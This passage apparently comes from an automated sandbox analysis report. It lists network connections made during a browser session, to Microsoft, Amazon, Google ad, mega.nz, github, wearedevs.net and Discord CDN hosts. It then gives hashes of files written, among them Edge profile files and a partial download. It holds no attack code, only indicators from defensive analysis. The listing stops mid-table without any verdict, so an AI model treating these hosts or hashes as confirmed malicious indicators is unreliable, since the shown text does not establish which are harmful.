| US | 34.120.154.120:443 | publisher.liveperson.net | tcp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| US | 35.186.249.72:443 | d.impactradius-event.com | tcp |
| FR | 52.222.169.50:443 | cdnssl.clicktale.net | tcp |
| US | 150.171.28.10:443 | bat.bing.com | tcp |
| GB | 184.28.198.202:443 | analytics.tiktok.com | tcp |
| GB | 2.18.109.131:443 | c.s-microsoft.com | tcp |
| US | 8.8.8.8:53 | 218.198.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.154.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.97.249.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.97.249.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.249.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.169.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.198.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.134:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 8.8.8.8:53 | u.clarity.ms | udp |
| US | 4.227.249.197:443 | u.clarity.ms | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 13.89.179.11:443 | browser.events.data.microsoft.com | tcp |
| US | 13.89.179.11:443 | browser.events.data.microsoft.com | tcp |
| US | 13.89.179.11:443 | browser.events.data.microsoft.com | tcp |
| US | 13.89.179.11:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 197.249.227.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 104.18.40.47:443 | sapphire-service.gitbook.io | udp |
| US | 104.18.41.89:443 | app.gitbook.com | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 89.44.169.134:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.134:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 134.169.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.125.203.66.in-addr.arpa | udp |
| LU | 89.44.169.134:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | gfs204n071.userstorage.mega.co.nz | udp |
| NL | 185.206.24.31:443 | gfs204n071.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs206n167.userstorage.mega.co.nz | udp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.77:443 | gfs206n167.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 31.24.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.37.24.94.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| GB | 95.101.143.210:443 | www.bing.com | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 88.221.135.25:443 | r.bing.com | udp |
| GB | 88.221.135.25:443 | r.bing.com | udp |
| GB | 88.221.135.25:443 | r.bing.com | udp |
| US | 8.8.8.8:53 | 25.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 88.221.135.26:443 | www.bing.com | udp |
| GB | 88.221.135.26:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 88.221.135.3:443 | r.bing.com | udp |
| GB | 95.101.143.35:443 | th.bing.com | udp |
| GB | 95.101.143.35:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | 3.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | www.amazon.com | udp |
| FR | 205.251.207.238:443 | www.amazon.com | tcp |
| FR | 205.251.207.238:443 | www.amazon.com | tcp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| US | 8.8.8.8:53 | images-na.ssl-images-amazon.com | udp |
| US | 8.8.8.8:53 | completion.amazon.com | udp |
| FR | 3.165.133.99:443 | images-na.ssl-images-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | tcp |
| FR | 18.245.193.37:443 | m.media-amazon.com | udp |
| FR | 18.245.193.37:443 | m.media-amazon.com | udp |
| US | 8.8.8.8:53 | fls-na.amazon.com | udp |
| US | 44.195.242.110:443 | fls-na.amazon.com | tcp |
| US | 8.8.8.8:53 | get.adobe.com | udp |
| FR | 3.165.133.99:443 | images-na.ssl-images-amazon.com | udp |
| US | 8.8.8.8:53 | 238.207.251.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.133.165.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.193.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.242.195.44.in-addr.arpa | udp |
| FR | 3.165.133.99:443 | images-na.ssl-images-amazon.com | udp |
| US | 8.8.8.8:53 | aax-us-iad.amazon.com | udp |
| US | 54.239.17.248:443 | aax-us-iad.amazon.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 23.73.137.233:443 | aefd.nelreports.net | tcp |
| US | 8.8.8.8:53 | affiliate-program.amazon.com | udp |
| US | 8.8.8.8:53 | aws.amazon.com | udp |
| US | 8.8.8.8:53 | advertising.amazon.com | udp |
| US | 8.8.8.8:53 | blinkforhome.com | udp |
| US | 8.8.8.8:53 | blog.aboutamazon.com | udp |
| US | 8.8.8.8:53 | developer.amazon.com | udp |
| US | 8.8.8.8:53 | 248.17.239.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.137.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eero.com | udp |
| US | 8.8.8.8:53 | go.thehub-amazon.com | udp |
| US | 8.8.8.8:53 | kdp.amazon.com | udp |
| US | 8.8.8.8:53 | music.amazon.com | udp |
| US | 8.8.8.8:53 | ring.com | udp |
| US | 8.8.8.8:53 | pro.imdb.com | udp |
| US | 8.8.8.8:53 | sell.amazon.com | udp |
| US | 8.8.8.8:53 | services.amazon.com | udp |
| US | 8.8.8.8:53 | shop.ring.com | udp |
| US | 8.8.8.8:53 | www.woot.com | udp |
| US | 8.8.8.8:53 | www.zappos.com | udp |
| US | 8.8.8.8:53 | videodirect.amazon.com | udp |
| US | 8.8.8.8:53 | www.6pm.com | udp |
| US | 8.8.8.8:53 | www.abebooks.com | udp |
| US | 8.8.8.8:53 | www.aboutamazon.com | udp |
| FR | 205.251.207.238:443 | www.amazon.com | udp |
| US | 44.215.142.139:443 | completion.amazon.com | tcp |
| US | 8.8.8.8:53 | www.acx.com | udp |
| US | 8.8.8.8:53 | www.amazon.jobs | udp |
| US | 8.8.8.8:53 | www.amazon.science | udp |
| US | 8.8.8.8:53 | unagi.amazon.com | udp |
| US | 8.8.8.8:53 | www.audible.com | udp |
| US | 8.8.8.8:53 | www.boxofficemojo.com | udp |
| US | 8.8.8.8:53 | www.goodreads.com | udp |
| US | 44.215.133.78:443 | unagi.amazon.com | tcp |
| US | 8.8.8.8:53 | www.imdb.com | udp |
| US | 8.8.8.8:53 | www.pillpack.com | udp |
| US | 8.8.8.8:53 | www.shopbop.com | udp |
| US | 8.8.8.8:53 | unagi-na.amazon.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | www.veeqo.com | udp |
| US | 44.215.139.172:443 | unagi-na.amazon.com | tcp |
| FR | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cloudfront-labs.amazonaws.com | udp |
| US | 98.82.154.76:443 | s.amazon-adsystem.com | tcp |
| US | 72.21.202.25:443 | cloudfront-labs.amazonaws.com | tcp |
| US | 44.215.139.172:443 | unagi-na.amazon.com | tcp |
| US | 44.215.133.78:443 | unagi.amazon.com | tcp |
| US | 72.21.202.25:443 | cloudfront-labs.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 139.142.215.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.133.215.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.194.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.154.82.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.139.215.44.in-addr.arpa | udp |
| US | 44.215.133.78:443 | unagi.amazon.com | tcp |
| US | 44.215.133.78:443 | unagi.amazon.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 95.101.143.210:443 | th.bing.com | udp |
| GB | 88.221.135.19:443 | r.bing.com | udp |
| GB | 95.101.143.210:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | 19.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | wearedevs.net | udp |
| US | 172.67.71.2:443 | wearedevs.net | tcp |
| US | 172.67.71.2:443 | wearedevs.net | tcp |
| US | 172.67.71.2:443 | wearedevs.net | udp |
| US | 8.8.8.8:53 | 2.71.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.wearedevs.net | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.179.227:443 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| GB | 64.233.167.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 216.58.204.66:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 216.58.212.193:443 | ep2.adtrafficquality.google | tcp |
| GB | 216.58.212.193:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| GB | 216.58.204.66:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.66:443 | googleads4.g.doubleclick.net | tcp |
| GB | 172.217.169.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.66:443 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 172.217.169.10:443 | imasdk.googleapis.com | tcp |
| GB | 172.217.169.10:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | cdnwrd2.com | udp |
| US | 8.8.8.8:53 | 70.169.217.172.in-addr.arpa | udp |
| US | 172.67.166.253:443 | cdnwrd2.com | tcp |
| US | 172.67.166.253:443 | cdnwrd2.com | tcp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | bid.g.doubleclick.net | udp |
| PH | 142.251.220.195:443 | csi.gstatic.com | tcp |
| PH | 142.251.220.195:443 | csi.gstatic.com | tcp |
| BE | 64.233.184.155:443 | bid.g.doubleclick.net | tcp |
| PH | 142.251.220.195:443 | csi.gstatic.com | tcp |
| GB | 216.58.204.66:443 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 253.166.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.184.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.220.251.142.in-addr.arpa | udp |
| PH | 142.251.220.195:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | servedby.flashtalking.com | udp |
| GB | 95.100.245.165:443 | servedby.flashtalking.com | tcp |
| GB | 95.100.245.165:443 | servedby.flashtalking.com | tcp |
| US | 8.8.8.8:53 | 165.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.flashtalking.com | udp |
| GB | 95.100.244.38:443 | secure.flashtalking.com | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | cdn.flashtalking.com | udp |
| FR | 52.222.169.125:443 | cdn.flashtalking.com | tcp |
| US | 8.8.8.8:53 | 38.244.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.169.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ad-events.flashtalking.com | udp |
| US | 8.8.8.8:53 | data.ad-score.com | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | d9.flashtalking.com | udp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| GB | 35.179.46.66:443 | ad-events.flashtalking.com | tcp |
| IE | 52.212.141.141:443 | d9.flashtalking.com | tcp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | tcp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | tcp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| US | 8.8.8.8:53 | 66.46.179.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.141.212.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.115.211.130.in-addr.arpa | udp |
| GB | 23.73.137.233:443 | aefd.nelreports.net | udp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 443a627d539ca4eab732bad0cbe7332b |
| SHA1 | 86b18b906a1acd2a22f4b2c78ac3564c394a9569 |
| SHA256 | 1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9 |
| SHA512 | 923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 99afa4934d1e3c56bbce114b356e8a99 |
| SHA1 | 3f0e7a1a28d9d9c06b6663df5d83a65c84d52581 |
| SHA256 | 08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8 |
| SHA512 | 76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da |
\??\pipe\LOCAL\crashpad_4188_CVHWDJGLCOACVZKR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4f6f6804459c214516c2194a45c8e2ef |
| SHA1 | 5a5a9f81ef0826e1057ca6e74bf9e0ce528507bc |
| SHA256 | 1dba4d29ea72cf22d06a8b575d18afa826684f378a3ab96c5b87a04f86b95ed2 |
| SHA512 | ab942f9f671001433df1ceb9ed1b0cd5ac562b55be793a0e7702127eb8aa93f34d052bb93f6853fd1b468cfc4c0a6af2ea9ceb2b60ccb74842fc0209f53ada5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 707e5b10b26b6edc790fbc11140b19ce |
| SHA1 | 4928fca6905c3b4f951794c9780ad0d19bbf31f5 |
| SHA256 | 64b2cdd34fe5a32b0c663c5d817184b848557fbf4c2b1f9499c419dc1424ca4d |
| SHA512 | 210794bc01bbc7262de52787b8b8faf2b07de18f1bdd63b8b5a761316301c94812b088f92678cbb647d7521dc23e04762becc31ea07380078886b05d8799e410 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 61c88f259423a21f203a0298ea9b2e7f |
| SHA1 | 18142f8ae94bd65fac2ef33541e1382e0426b087 |
| SHA256 | 9dd724d3677e702079409e49ce265ac7ffa4b2ef737d61fb203a34f1cec73fb1 |
| SHA512 | 4e1712c298e26c90361e221e76269a7faf2ce0fd95955d87990b399c6eb39b7b0dce78cf6c916ed747001b868ce1f4f189d07b1ede6870bfa84e6f19a88a7914 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019
| MD5 | 6660d7bb2686cbb2868a167582b37335 |
| SHA1 | c6438226a3beda7de1ae1c13a649bcf462b20f5a |
| SHA256 | d6892f8a5018968bf5b32d19acf35d726aaf4ca8ddc201a6ab652d04785261a7 |
| SHA512 | 253fefddddaa49920111524692ce811924d35efe25b4b12c98d7d70e6ca5636929b98be9eb2210727c444371a5f72938e43609a19d05846a8e9b05516b1a3c2c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6bfb2fa08ff6ddd6af2a8560e4389234 |
| SHA1 | c934d7f56665a45bc91f88eb054abe8da054a63b |
| SHA256 | aa9948847e44f42b2e1f6d3b281386d89790ab6f713c14fb8f22c4897b5947ca |
| SHA512 | a03d6a96c4236cbb881a274d95e2312049f1e8ae0c11ee2db700e6b9b3e71154687f7fbb4c6d879c185b93a5f5b7e43ffb2df754187a05f8b3556242becff1c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | adce1ccf249a6e6b1b38de4d4aa9f2d4 |
| SHA1 | a06214d0faa0f2da700a27a0da6e91e86223de19 |
| SHA256 | 751d41476edba8e768fe18c5b9c22874ffec33004322de3fd8d9f5ae2be8cce5 |
| SHA512 | 8722f0be7d828747c0c1a388accdbd1f9e19df627bdde4df87f71723d32eef00ae42ce99b7fe2a267507ef6f586c91211277635a3d373209f30a241593bc55b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5847a3.TMP
| MD5 | 1dae57d3cf2497b301a736c286670fef |
| SHA1 | b043d6d8268e6581e1c33d636435582054ab2d86 |
| SHA256 | b10dd9d5649befcd0d28a9e3abf3e64a0c6f23ace5f8e23ddad2a1740fb5e920 |
| SHA512 | 82cd9d6e2f35a89066dcc2de0383a6723762b942391f2ebed5eab8e7641fb470e7a167b73c625343e823eb764a4afb30eafe29ddc1b7ca9da24cf17c55156ff3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4ba22151353468d858be2910ded4f722 |
| SHA1 | 11a0fdf906f301e6d418796411155a34ddac46da |
| SHA256 | 415bb2ee498c8d42ad1bc0c10e024ff40302eb529d3d5f8aea8dc896029f9898 |
| SHA512 | 2a8f9c8eead50ac61356acf2e7bbea69c374923a4303c1290ba5dd2ce03cd9caf26104e8d4cd98b2244fa724628400c6acb8808f4b5ddd0d18e290552ab09bc4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 17178477146e04453459c96ce8b3d46c |
| SHA1 | b83fe3d40aa03f89fea6522f51d4baa1519f80ef |
| SHA256 | 14bf3d65027be52d1fa0e7298456e03316098ebdbe9dc3b1aaf4f2c39efae8ab |
| SHA512 | def1b9e87f6d9a491dcd8bbe328d335958466e2c45493dad8e6786d635108c27280253aa2ca66493dfcb82a736ebe9d22a7182717987273a39230ff5abda59f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8f5c2b95b952c2a994de26aec19985b9 |
| SHA1 | 745dec61a008c96e83d5c28772c799459001f908 |
| SHA256 | 70ebb4036cb84306b5277cc4b50793c32946ba590d3918718baea7b1f3aa1740 |
| SHA512 | efc194480c101318a0ebb2eee53b739d371232050625232f1fe900217a3f9855da7a37b3610d54b1e5172a220d4cae8cbd02a3dc84983702ad9a7bf7a3d7f249 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 07a103f8bbd62e26a5b6641a9c8f9068 |
| SHA1 | d103db7ebfbc68814b03ec92c64e8b8089b8d7f8 |
| SHA256 | c28c2c642876f6847f78e3b5941606410e659cec99bcea0369d7589d06b799c4 |
| SHA512 | 77f6e3db85c90523d48ba9b7cd923dee0b08b32f1fae26429015adaa59ca3e3351197523548497addcba3e5d5e1be28138484931a3a47442fc207337ec3fbfc3 |
C:\Users\Admin\Downloads\Unconfirmed 62816.crdownload
| MD5 | a141303fe3fd74208c1c8a1121a7f67d |
| SHA1 | b55c286e80a9e128fbf615da63169162c08aef94 |
| SHA256 | 1c3c3560906974161f25f5f81de4620787b55ca76002ac3c4fc846d57a06df99 |
| SHA512 | 2323c292bfa7ea712d39a4d33cdd19563dd073fee6c684d02e7e931abe72af92f85e5bf8bff7c647e4fcdc522b148e9b8d1dd43a9d37c73c0ae86d5efb1885c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027
| MD5 | e579aca9a74ae76669750d8879e16bf3 |
| SHA1 | 0b8f462b46ec2b2dbaa728bea79d611411bae752 |
| SHA256 | 6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf |
| SHA512 | df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 61287f5790d8157e014802eb99c7d29a |
| SHA1 | 41c883b968627b74e6f053df90b2997561a89ac3 |
| SHA256 | eaec0a77dcc18635e10e9b7c85bdca6e5296ee99efb13d24bb2a69fd311cbe82 |
| SHA512 | a0e5256412be81450b15637d1ab552e9b77b6f312f131c0daa99f8c38ffcb9e9f40f5b5e271a93be1520b95fd5aaabbda49b191a4f64d3670cdce1e6f17e039a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7617e1ceb7a439076bcfa48547ac0322 |
| SHA1 | 33e0f7b243e58cbd9346b4a96209e8bb6ff80ddd |
| SHA256 | f096e6e8ed7ea07feca5027ddf99b34fa3843ecf40c04c103dc4d3bc15ae9c4c |
| SHA512 | 9ad3f5340c6577c69eca76506049fbb27157ee0c1bdd620eeee43efb4e50ce8903f49611890847a9de8a9df20f36cf3f9428f24a7c4cd73e0016ec9fab33a824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 87e3fc683b7947fcac8182c1730c0ea4 |
| SHA1 | 371e9247b62bc6fe7bda9cccb8fb2100e5ec8ab5 |
| SHA256 | 198f4ffbdeb402623443fa0aad5de586fc70f45b3726e6f62fd5b6c44a5f3ab4 |
| SHA512 | 2ce15b45f1f661c8b650c11cfaf54497fa1a42b5e30abf1c46013273b010cb4e518f004f1d393e56e604ce52ad6b82099184f18178e119cfbfe0f31008f7104a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8e6209b68bf9fe5861ed75d1951a3fe7 |
| SHA1 | e6f1fb11b0ccd6fc26d76b542f1be507d63cbc75 |
| SHA256 | 6a8a24f9d6a07302c1c739980b45b020067eae6a0582ed7449abadc457f97e5a |
| SHA512 | a7d8610a6f8f173a8f1c91c744a373065fc72cffc2b13654c0337dbb963609a1b928069d1f208d905000c2ae40e0ba5cad73b7ce3a402cd330d714afa1e00fde |
C:\Config.Msi\e591804.rbs
| MD5 | aa6a42f6ced2dac2c93f60ccc6da59ba |
